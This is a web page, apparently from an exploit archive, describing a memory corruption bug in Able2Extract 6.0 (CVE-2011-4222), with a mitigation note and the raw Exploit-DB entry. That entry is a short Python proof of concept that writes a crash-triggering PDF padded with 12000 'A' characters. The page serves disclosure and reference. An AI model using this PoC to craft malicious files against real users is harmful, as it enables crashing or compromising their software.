Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Able2Extract and Able2Extract Server v 6.0 Memory Corruption - exploit.company
header-logo
Suggest Exploit
vendor:
Able2Extract
by:
Carlos Mario Penagos Hollmann
7.5
CVSS
HIGH
Memory Corruption
119
CWE
Product Name: Able2Extract
Affected Version From: 6
Affected Version To: 6
Patch Exists: NO
Related CWE: CVE-2011-4222
CPE: a:investintech:able2extract:6.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 7
2012

Able2Extract and Able2Extract Server v 6.0 Memory Corruption

The exploit involves creating a malicious PDF file with a payload that causes a memory corruption in Able2Extract and Able2Extract Server v 6.0. By opening the crafted PDF file, an attacker can trigger the memory corruption and potentially execute arbitrary code.

Mitigation:

To mitigate this vulnerability, users are advised to update to a patched version of Able2Extract and Able2Extract Server. Additionally, exercise caution when opening PDF files from untrusted sources.
Source

Exploit-DB raw data:

# Exploit Title: Able2Extract and Able2Extract Server v 6.0 Memory
Corruption
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.investintech.com
# Version:6.0
# Tested on: Windows 7
# CVE : cve-2011-4222


payload ="A"*12000
crash="startxref"
pdf=payload+crash

filename = "slimpdPoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()

Navigation

Suggest Exploit

Services By CQR